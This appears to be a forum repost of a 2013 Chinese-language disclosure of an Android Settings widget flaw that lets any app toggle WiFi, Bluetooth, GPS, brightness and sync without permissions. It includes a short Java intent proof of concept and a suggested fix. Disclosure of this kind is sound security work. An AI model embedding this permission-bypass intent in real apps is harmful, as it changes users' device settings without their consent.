|
|
|
披露状态:
2013-03-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
Settings应用含有com.android.settings.widget.SettingsAppWidgetProvider,其伴随有onReceive方法来实现相关功能的开启和关闭;然而问题是,任何应用都可以直接发送带有此方法的intent从而启动/关闭相应功能。
详细说明:
此漏洞已经在http://code.google.com上举报:
http://code.google.com/p/android/issues/detail?id=14602&q=exploit&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars
不知此漏洞网站上有无,仅为得号!!!
漏洞证明:
发送下面的intent信息可以让应用触发WiFi, Bluetooth, and location provider states ,且不需要相关申请权限(CHANGE_WIFI_STATE, BLUETOOTH_ADMIN, and ACCESS_FINE_LOCATION, respectively):
Intent intent = new Intent("test");
intent.setClassName("com.android.settings",
"com.android.settings.widget.SettingsAppWidgetProvider");
intent.addCategory(Intent.CATEGORY_ALTERNATIVE);
intent.setData(Uri.fromParts("0", "0", "0")); // 0 is for WiFi
sendBroadcast(intent);
Change 0 to 3 for GPS and 4 for Bluetooth. You can also toggle Brightness and Sync settings with 1 and 2, respectively.
修复方案:
对此com.android.settings.widget.SettingsAppWidgetProvider组件添加权限
|
|
窥视卡
雷达卡
发表于 2013-3-10 01:42:27
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2013-3-10 02:56:57